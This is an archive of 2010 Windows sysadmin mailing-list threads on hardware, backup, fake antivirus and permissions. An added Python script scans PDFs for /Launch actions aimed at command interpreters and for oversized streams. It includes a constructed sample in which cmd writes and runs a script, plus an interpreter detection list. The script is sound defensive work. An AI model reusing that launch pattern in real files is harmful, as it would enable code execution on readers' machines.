looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality. 

This entry was posted on Tuesday, April 27th, 2010 at 6:24 pm.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org

From: Ralph Smith [mailto:m...@gatewayindustries.org] 
Sent: Wednesday, April 28, 2010 2:38 PM
To: NT System Admin Issues
Subject: RE: Low-profile desktop Ethernet adapters

We have about 35 GX520 Small Form Factor computers here.  Out of those we have 
had 2 motherboards replaced, but the biggest problem has been the fan in the 
power supply - I think we are up to about a dozen of them gone bad so far.  
Since they are all out of warranty now, we're just replacing the fans as they 
go bad.
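
An added example, not part of the SecureWorks write-up or of the post above: a static triage check for the two traits that write-up describes, a /Launch action that points at a command interpreter and a stream holding far more bytes than its /Length declares. The sample bytes, function names and interpreter list are constructed for illustration, and the scan only sees uncompressed objects.

```python
import re

# Constructed, harmless sample shaped like the objects quoted in the post: the
# command only echoes a greeting and the "hidden" lines are filler text.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"5 0 obj\n<< /Length 46 >>\nstream\n"
    b"BT\n/F1 34 Tf\n50 500 Td\n(Important Information)Tj\n"
    b"%'SS\n" + b"%filler line standing in for hidden script text\n" * 20 + b"%'EE\n"
    b"endstream\nendobj\n"
    b"8 0 obj\n<<\n /Type /Action\n /S /L#61unch\n /Win\n <<\n"
    b"  /F (cmd.exe)\n"
    b'  /P (/c echo WScript.Echo("constructed sample") > demo.vbs && demo.vbs)\n'
    b" >>\n>>\nendobj\n"
    b"9 0 obj\n<< /Type /Action /S /URI /URI (https://example.com/) >>\nendobj\n"
    b"%%EOF\n"
)

NAME = re.compile(rb"/[^\s()<>\[\]{}/%]+")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# An object body runs to "endobj", the next object header, or end of data.
OBJ = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)(?=endobj|\d+\s+\d+\s+obj\b|\Z)", re.S)
LAUNCH = re.compile(rb"/S\s*/Launch(?![A-Za-z0-9])")
# Only a direct integer /Length is compared; "/Length 12 0 R" is skipped.
STREAM = re.compile(
    rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)[^>]*>>\s*stream\r?\n(.*?)\r?\n?endstream", re.S)
SCRIPT_EXT = re.compile(r"\.(vbs|bat|cmd|js|exe)\b", re.I)
# Assumed list of interpreters worth flagging; extend to suit local policy.
INTERPRETERS = {"cmd", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside PDF names so /L#61unch reads as /Launch."""
    def unescape(m):
        return HEX_ESCAPE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(0))
    return NAME.sub(unescape, data)


def read_literal_string(data: bytes, start: int) -> bytes:
    """Return the literal string whose '(' is at data[start].

    Parentheses nest in PDF strings, so depth is tracked. Simplification: a
    backslash escape keeps the following byte as-is (no \\n or octal decoding).
    """
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        ch = data[i:i + 1]
        if ch == b"\\" and i + 1 < len(data):
            out += data[i + 1:i + 2]
            i += 2
            continue
        if ch == b"(":
            depth += 1
            if depth > 1:
                out += ch
        elif ch == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += ch
        else:
            out += ch
        i += 1
    return bytes(out)  # unterminated string: return what was read


def string_after(body: bytes, key: bytes):
    """Value of /<key> when it is a literal string, else None."""
    m = re.search(rb"/" + key + rb"\s*\(", body)
    return read_literal_string(body, m.end() - 1).decode("latin-1") if m else None


def scan_launch_actions(pdf: bytes) -> list:
    """Report every object that carries a /Launch action, with reasons."""
    findings = []
    for m in OBJ.finditer(normalize_names(pdf)):
        body = m.group(2)
        if not LAUNCH.search(body):
            continue
        target, params = string_after(body, b"F"), string_after(body, b"P")
        reasons = ["Launch action present"]
        if target and target.lower().replace("\\", "/").rsplit("/", 1)[-1] in INTERPRETERS:
            reasons.append("target is a command or script interpreter")
        if params and SCRIPT_EXT.search(params):
            reasons.append("parameters reference a script or executable file")
        findings.append({"object": int(m.group(1)), "target": target,
                         "params": params, "reasons": reasons})
    return findings


def scan_stream_lengths(pdf: bytes, slack: int = 64) -> list:
    """Flag streams holding far more bytes than their direct /Length declares."""
    flagged = []
    for m in STREAM.finditer(pdf):
        declared, actual = int(m.group(1)), len(m.group(2))
        if actual - declared > slack:
            flagged.append({"declared": declared, "actual": actual})
    return flagged


if __name__ == "__main__":
    for finding in scan_launch_actions(SAMPLE_PDF):
        print(finding)
    print(scan_stream_lengths(SAMPLE_PDF))
```

Objects stored inside compressed object streams are not visible to this scan, so a clean result on a real file does not rule out a Launch action.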





sig pad for Word

2010-04-28 Thread James Kerr
Can anyone recommend an inexpensive USB signature pad for signing Word
documents?

James

RE: Low-profile desktop Ethernet adapters

2010-04-28 Thread Ralph Smith
We have about 35 GX520 Small Form Factor computers here.  Out of those
we have had 2 motherboards replaced, but the biggest problem has been
the fan in the power supply - I think we are up to about a dozen of them
gone bad so far.  Since they are all out of warranty now, we're just
replacing the fans as they go bad.

 



From: Carol Fee [mailto:c...@massbar.org] 
Sent: Wednesday, April 28, 2010 1:06 PM
To: NT System Admin Issues
Subject: RE: Low-profile desktop Ethernet adapters

 

How has your experience been with the Optiplex GX520's.  We have had
roughly 30% motherboard failure rate.

 

CFee

From: John Aldrich [mailto:jaldr...@blueridgecarpet.com] 
Sent: Wednesday, April 28, 2010 9:42 AM
To: NT System Admin Issues
Subject: Low-profile desktop Ethernet adapters

 

I need to put a low-profile NIC to replace the on-board NIC that has
gone out on one of our Dell Optiplex GX520 machines.  Wondering what you
guys recommend? I tried to just put an extra NIC that we have lying
around in the system, but discovered that it's too tall. :-(  Any
favorite brand? Unfortunately, my favorite place (NewEgg) only carries
a handful of low-profile NICs and none of them are "name brand." :-(

RE: Anyone Used Zmanda backup?

2010-04-28 Thread Joseph L. Casale
I used to use the Enterprise version, it lacked some trivial features like an 
automated verify and the html based console was not all that friendly.
I use Bacula in a mixed environment now...
I like it much better.

From: justino garcia [mailto:jgarciaitl...@gmail.com]
Sent: Wednesday, April 28, 2010 11:59 AM
To: NT System Admin Issues
Subject: Anyone Used Zmanda backup?

Anyone using Zmanda in production, how good is it?

Have you tested a recovery, how does it handle retention policies? And would
you recommend it for off-site backups?

thanks

--
Justin
IT-TECH

RE: Document Management Systems

2010-04-28 Thread Raper, Jonathan - Eagle
+1 - I'm looking for this kind of information as well.

We're looking to leverage the fax server built into our Electronic Medical 
Record system to handle administrative/non-clinical information in order to 
minimize the receipt of paper faxing altogether, if possible. This would 
require a third party application to grab the documents from the fax server. 
Taking it a step further, I could see the possible assigning of fax numbers to 
individuals, but we've got to have a workable solution in place first. I'm sure 
whatever we decide on would be able to do much more than that, but that would 
be our entry point.

Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.com
www.eaglemds.com


-Original Message-
From: Roger Wright [mailto:rhw...@gmail.com]
Sent: Wednesday, April 28, 2010 2:11 PM
To: NT System Admin Issues
Subject: Document Management Systems

My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___




Re: WTF? Fake AV - resolved.

2010-04-28 Thread Brian Richards
I was under the impression that Defender is not AV so much as anti-spyware? And 
that Vipre (originally called antivirus + antispyware) offers to take over the 
antispyware functions from Defender?





From: Angus Scott-Fleming 
To: NT System Admin Issues 
Sent: Wed, April 28, 2010 12:32:22 PM
Subject: Re: WTF? Fake AV - resolved.

On 28 Apr 2010 at 8:16, Brian Richards  wrote:

>    Hmmm, at home I've been telling Vipre to turn off Windows 
>    Defender - maybe time to re-think that strategy?

I don't think you want to run two AV packages simultaneously -- that's just 
asking for trouble. 

I'd like to see a command-line deep-scanner from a second AV vendor that you 
could run nightly as a "Scheduled Task" while running a different AV as your 
"Active Protection" or "Real-Time Protection".  McAfee used to offer a CL 
scanner, not sure if they still do.  ClamAV does.  Might have to look into that 
as an idea


RE: backup software solution for offsite

2010-04-28 Thread Charlie Kaiser
OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds like
you need two separate configs; one is the VPN/IPSEC connectivity, and the
other is the backup application.

Create the tunnel to the NAS device using your connectivity method of
choice.

Then run the backup locally and do either a copy job (like backup exec
provides) or manually script a copy up to the NAS. The big hurdle you're
going to run into is trying to copy large files across that link quickly and
reliably. 

Image files present a big challenge since even small changes result in new
image files that must be uploaded separately.

There are 3rd party tools that can accommodate this, but I don't have a
specific recommendation. I haven't found one that I like.

Another thing to watch for will be data transfer windows. Depending on the
size of the upload and the link speed, you could easily run into an
overlap...

I've had clients want something like this and we have always either moved
media physically using a manual offsite service like Iron Mountain or
Datasafe or used Amazon or Mozy. We ran into too many hurdles with bandwidth
utilization and time windows.

Perhaps someone else has a better solution based on their experience...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com]
> Sent: Wednesday, April 28, 2010 10:34 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
>
> I host a server, in a rack, at someone else's data center (I rent a
> rack).
>
> In the rack, I have a Network Attached storage devices, and some other
> servers. Clients would like for it to go there, and so would I.
>
> On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser  wrote:
>
>   Are you saying your OWN datacenter? Or a hosted server in someone
>   else's datacenter?
>
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   > Sent: Wednesday, April 28, 2010 10:19 AM
>   > To: NT System Admin Issues
>   > Subject: Re: backup software solution for offsite
>   >
>   > I wish to not be hosted on a third party cloud, rather just host
>   > on our own server at the data center.
>   > And Mozy is good, but we want an image snapshot.
>   >
>   > Thanks
>   >
>   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser  wrote:
>   >
>   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   >
>   >   ***
>   >   Charlie Kaiser
>   >   charl...@golden-eagle.org
>   >   Kingman, AZ
>   >   ***
>   >
>   >   > -Original Message-
>   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   >   > Sent: Wednesday, April 28, 2010 10:08 AM
>   >   > To: NT System Admin Issues
>   >   > Subject: backup software solution for offsite
>   >   >
>   >   > I have a need to setup offsite backups via a ipsec tunnel,
>   >   > thru sftp ftp or smb.
>   >   > Something we can take daily inc snapshots and send over the
>   >   > internet using vpn, that has retention rules and alerts to
>   >   > admin (me) if a backup fails.
>   >   > Any commercial product any ideas?
>   >   >
>   >   > Thanks
>   >   >
>   >   > --
>   >   > Justin
>   >   > IT-TECH
>   >
>   > --
>   > Justin
>   > IT-TECH
>
> --
> Justin
> IT-TECH


Re: HP OEM OS Script Files

2010-04-28 Thread Tres Coker
I got rid of most of this, but after I sealed the image and reloaded it
immediately started running about 6 or 7 batch scripts, a Wake-On Lan
script, an Event Viewer script, security policy script...etc... I can't
figure out where these scripts are coming from.

On Wed, Apr 28, 2010 at 10:26 AM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 9:51 AM, Tres Coker  wrote:
> > I am creating an image of an HP dc7900 that I plan to deploy. This PC was
> > created using the HP OEM copy of windows.
>
>   Every HP OEM disc set I've ever seen is loaded with tons of crap,
> quite a bit of which cannot be removed, some of which does not even
> identify itself in "Add/Remove Programs", etc.
>
>  Use a vanilla Microsoft disc.
>
> -- Ben

RE: WTF? Fake AV

2010-04-28 Thread Carl Houseman
System folders and files are protected with NTFS permissions that are
read-only to non-admins.

Likewise the default permissions on the HKLM registry prevents users from
trashing it.

Carl

-Original Message-
From: greg.swe...@actsconsulting.net [mailto:greg.swe...@actsconsulting.net]

Sent: Wednesday, April 28, 2010 1:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let me restart.  I agree that the MAC OS is not more secure because it
has a less infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc..but even those most tech releases show it's still limited
to user context not root..

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privilege
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not put words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from a security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me why
> you think the *current* Windows security model is so much better than the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x security
> model would be stronger than Windows, as at least in Linux, if you try to
> install something as a user it simply fails stating you don't have permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At least
> that's the way I see things (from a limited experience with Win Vista and Win
> 7.)
>
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
>
> A) hardware driver models are a somewhat different beast, and that's held
> true for many a platform, and isn't really germane to what we are discussing
> here.
>
> B) MS provided that info to HW devs FAR in advance.
>
> The point is, carrying forward a user base in the 100's of millions and an app
> base in the 10's of thousands requires some significant transitioning. Now
> you can argue their timing all you want, but the OP's comment had two
> basic tenets that bear on this:
>
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
>
> 2) He was discussing the OS, not the apps written for them
>
> Using AV infection #'s to compare those things and draw the conclusion he
> did is not accurate, IMO.
>
> -sc
>
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare  wrote:
> > >> " But when Microsoft wants to, say, create a new API for something,
> > >> they just do, and abandon the old one, and everyone else has to play
> > >> catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben


Document Management Systems

2010-04-28 Thread Roger Wright
My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___



RE: backup software solution for offsite

2010-04-28 Thread Jay Dale
Look at DoubleTake:

www.doubletake.com

Pricey, but pretty dependable.

Jay Dale
I.T. Manager, 3GiG
Mobile: 713.299.2541
Email: jay.d...@3-gig.com



From: justino garcia [mailto:jgarciaitl...@gmail.com]
Sent: Wednesday, April 28, 2010 12:19 PM
To: NT System Admin Issues
Subject: Re: backup software solution for offsite

I wish to not be hosted on a third-party cloud, but rather just host on our own
server at the data center.
And Mozy is good, but we want an image snapshot.

Thanks
On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser <charl...@golden-eagle.org> wrote:
Check out Mozy Pro (Mozy.com) or Amazon Web Services.

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***

> -Original Message-
> From: justino garcia 
> [mailto:jgarciaitl...@gmail.com]
> Sent: Wednesday, April 28, 2010 10:08 AM
> To: NT System Admin Issues
> Subject: backup software solution for offsite
>
> I have a need to set up offsite backups via an ipsec tunnel,
> thru sftp, ftp or smb.
> Something we can take daily inc snapshots and send over the
> internet using vpn, that has retention rules and alerts to
> admin (me) if a backup fails.
> Any commercial product, any ideas?
>
> Thanks
>
>
> --
> Justin
> IT-TECH
>



--
Justin
IT-TECH






Anyone Used Zmanda backup?

2010-04-28 Thread justino garcia
Anyone using Zmanda in production, how good is it?

Have you tested a recovery, how does it handle retention policies? And would
you recommend it for off-site backups?

thanks

-- 
Justin
IT-TECH


RE: SQL Server 2005 management suite

2010-04-28 Thread RichardMcClary
Thanks!  I didn't notice that last part..

"SSMSE can also manage instances of the SQL Server Database Engine created 
by any edition of SQL Server 2005."
--
RMc

Jay Dale  wrote on 04/28/2010 12:31:04 PM:

> Is this what you need?
> 
> http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796
> 
> 
> Jay Dale
> I.T. Manager, 3GiG
> Mobile: 713.299.2541
> Email: jay.d...@3-gig.com 
> 
> 
> 
> From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org] 
> Sent: Wednesday, April 28, 2010 11:40 AM
> To: NT System Admin Issues
> Subject: SQL Server 2005 management suite
> 
> 
> Greetings! 
> 
> I have a server (Win 2003) with MS SQL Server 2005 (not "Express") 
> on it as a part of my VMWare management system.  I need to back up 
> this database.  It does _not_ have the "Management Suite" installed.
> I do not believe I have the license key for that installation, either. 
> 
> I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS 
> Library" CD).  I also have the download for SQL Server 2005 Express 
> Management Suite. 
> 
> What is the least bad way to get MS management (again, just for DB 
> backup) onto this machine? 
> 
> I figure the "Express" version will not work with "Full" SQL Server, right?
> 
> If I were to use one of the "Full" setup disks and run "Setup",
> would I have the option of modifying (i.e., adding Management Suite) to
> the current install and existing database?  Is this reasonably safe to do?
> 
> I've obviously never before run SQL Server setup before - thanks!
> -- 
> Richard D. McClary 
> Systems Administrator, Information Technology Group 
> ASPCA® 
> 1717 S. Philo Rd, Ste 36 
> Urbana, IL  61802 
> 
> richardmccl...@aspca.org 
> 
> P: 217-337-9761 
> C: 217-417-1182 
> F: 217-337-9761 
> www.aspca.org 
> 

RE: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Mayo, Bill
Wow, that's informative--thanks for that.  Microsoft had a seminar in
our city about 5 years ago, and I actually asked one of their support
folks about this.  He had no idea what I was talking about and said that
he had never heard of that before, so I figured I was out of luck.

That said, it is unfortunately not a solution for me, because of this:
"Make sure that the user account that is used to move the object has the
Change Permissions permission set. If the permission is not set, grant
the Change Permissions permission to the user account."  If I gave folks
the ability to change permissions on these secured directories, I would
have no end of problems.  Actually, I have the permissions set the way I
do to keep folks from monkeying around with that stuff in the first
place.

Bill Mayo 

-Original Message-
From: Crawford, Scott [mailto:crawfo...@evangel.edu] 
Sent: Wednesday, April 28, 2010 1:31 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

The values you want are

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ForceCopyAclwithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MoveSecurityAttributes

This KB details this:

http://support.microsoft.com/kb/310316


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov]
Sent: Wednesday, April 28, 2010 12:08 PM
To: NT System Admin Issues
Subject: RE: The finer points of NTFS ACLs (was: Software installs on
new PCs)

+infinity

We do exactly what you describe, and I always have issues (mostly when
doing file migrations due to server moves) related to people copying
files from one secured directory to another and the permissions not
getting updated.  When the permissions are set to inherit from parent,
it seems to me that Windows should re-assess that on a file copy.

Bill Mayo 

-Original Message-
From: Ben Scott [mailto:mailvor...@gmail.com]
Sent: Wednesday, April 28, 2010 12:45 PM
To: NT System Admin Issues
Subject: The finer points of NTFS ACLs (was: Software installs on new
PCs)

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin wrote:
> We see this problem where people create folders under shared drives,
> that each new folder is owned by the creating user who then has the
> added rights.
> The solution is some weekly subinacl tasks that re-take ownership of
> the whole fileserver structure back to BUILTIN\Administrators

  Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

  All our shared folders are set so only the group(s) which should have
permission are present.

  The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant "CREATOR
OWNER" "Modify" on "Files only".  Now users can create the file, but
can't touch anything else.

  My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a file
is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben




RE: WTF? Fake AV

2010-04-28 Thread David Lum
With Win7 you can't create a file in the root of C:, %systemroot%,  %PROGFILES% 
etc unless you're elevated.

Dave

-Original Message-
From: greg.swe...@actsconsulting.net [mailto:greg.swe...@actsconsulting.net] 
Sent: Wednesday, April 28, 2010 10:33 AM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let me restart.  I agree that the MAC OS is not more secure because it
has a lower infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc., but even for those, most tech releases show it's still
limited to user context, not root.

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privilege
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not put words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from a security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me why
> you think the *current* Windows security model is so much better than the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x security
> model would be stronger than Windows, as at least in Linux, if you try to
> install something as a user it simply fails stating you don't have permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At least
> that's the way I see things (from a limited experience with Win Vista and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's held
> true for many a platform, and isn't really germane to what we are discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions and an app
> base in the 10's of thousands requires some significant transitioning. Now
> you can argue their timing all you want, but the OP's comment had two
> basic tenets that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion he
> did is not accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare wrote:
> > >> " But when Microsoft wants to, say, create a new API for something,
> > >> they just do, and abandon the old one, and everyone else has to play
> > >> catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >

Re: backup software solution for offsite

2010-04-28 Thread justino garcia
I host a server, in a rack, at someone else's data center (I rent a rack).

In the rack, I have Network Attached Storage devices and some other
servers. Clients would like for it to go there, and so would I.

On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser wrote:

> Are you saying your OWN datacenter? Or a hosted server in someone else's
> datacenter?
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:19 AM
> > To: NT System Admin Issues
> > Subject: Re: backup software solution for offsite
> >
> > I wish to not hosted on a third party cloud, rather just host
> > on our own server at the data center.
> > and Mozy good, but we want a image snapshot.
> >
> > Thanks
> >
> >
> > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
> >  wrote:
> >
> >
> >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
> >
> >   ***
> >   Charlie Kaiser
> >   charl...@golden-eagle.org
> >   Kingman, AZ
> >   ***
> >
> >
> >   > -Original Message-
> >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >   > Sent: Wednesday, April 28, 2010 10:08 AM
> >   > To: NT System Admin Issues
> >   > Subject: backup software solution for offsite
> >   >
> >   > I have a need to set up offsite backups via an ipsec tunnel,
> >   > thru sftp, ftp or smb.
> >   > Something we can take daily inc snapshots and send over the
> >   > internet using vpn, that has retention rules and alerts to
> >   > admin (me) if a backup fails.
> >   > Any commercial product, any ideas?
> >   >
> >   > Thanks
> >   >
> >   >
> >   > --
> >   > Justin
> >   > IT-TECH
> >   >
> >
> >
> >
> >
> >
> > --
> > Justin
> > IT-TECH
> >
> >
> >
> >
> >
> >
> >
>
>
>



-- 
Justin
IT-TECH


RE: WTF? Fake AV

2010-04-28 Thread greg.sweers
Let me restart.  I agree that the MAC OS is not more secure because it
has a lower infection rate.  Horrible way to justify security.  It's a
better security model because by default all users are non admins, and
the installation of anything requires the root password to install.
This limits exploits to the user rights and does not completely
trash the box.  This does not account for buffer overflows, memory
exploits etc., but even for those, most tech releases show it's still
limited to user context, not root.

I wanted to see a document that showed how Windows 7 helps limit
exploits to the user context, and even if a user was higher privilege
what does Win7 do to protect the kernel and main system files?


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 1:22 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Let's not put words in my mouth, OK? I'm not arguing that the Win7
security model is "so much better than the OS/X security model."

My stance is that the conclusion that was stated: The Mac OS is superior
to Win 7 from a security model perspective based on virus infection
numbers is flawed.

I've said before, and I'll say again: If you want to argue that the
choices made for defaults in that model were not clamped down quickly
enough in the name of compatibility, I might even be inclined to agree
with you. 

But the mechanisms are there, and as of the last few years, much more
sensible in terms of defaults, IMO.

-sc

> -Original Message-
> From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
> Sent: Wednesday, April 28, 2010 1:05 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> Ok, Steven. As you say, the OP was comparing Win 7 with OS/X. Tell me why
> you think the *current* Windows security model is so much better than the
> OS/X security model? It would seem to me that the Linux\Unix\OS/x security
> model would be stronger than Windows, as at least in Linux, if you try to
> install something as a user it simply fails stating you don't have permission,
> but in Windows, UAC actually *prompts* you to escalate privileges. At least
> that's the way I see things (from a limited experience with Win Vista and Win
> 7.)
> 
> 
> 
> 
> -Original Message-
> From: Steven M. Caesare [mailto:scaes...@caesare.com]
> Sent: Wednesday, April 28, 2010 12:54 PM
> To: NT System Admin Issues
> Subject: RE: WTF? Fake AV
> 
> A) hardware driver models are a somewhat different beast, and that's held
> true for many a platform, and isn't really germane to what we are discussing
> here.
> 
> B) MS provided that info to HW devs FAR in advance.
> 
> 
> The point is, carrying forward a user base in the 100's of millions and an app
> base in the 10's of thousands requires some significant transitioning. Now
> you can argue their timing all you want, but the OP's comment had two
> basic tenets that bear on this:
> 
> 1) He was comparing current day OS's (i.e. Win7 vs "the Mac")
> 
> 2) He was discussing the OS, not the apps written for them
> 
> Using AV infection #'s to compare those things and draw the conclusion he
> did is not accurate, IMO.
> 
> -sc
> 
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 12:47 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 11:56 AM, Steven M. Caesare wrote:
> > >> " But when Microsoft wants to, say, create a new API for something,
> > >> they just do, and abandon the old one, and everyone else has to play
> > >> catchup"
> > >
> > > I guess I haven't seen those multitude of Technet articles ...
> >
> >   Yah, tell that to anyone who had hardware that lacks Vista drivers.
> > Or has stuff written around Office 97-2003.  The fact that sometimes
> > Microsoft plays nice doesn't mean they always do.
> >
> > -- Ben
> >


RE: SQL Server 2005 management suite

2010-04-28 Thread Jay Dale
Is this what you need?

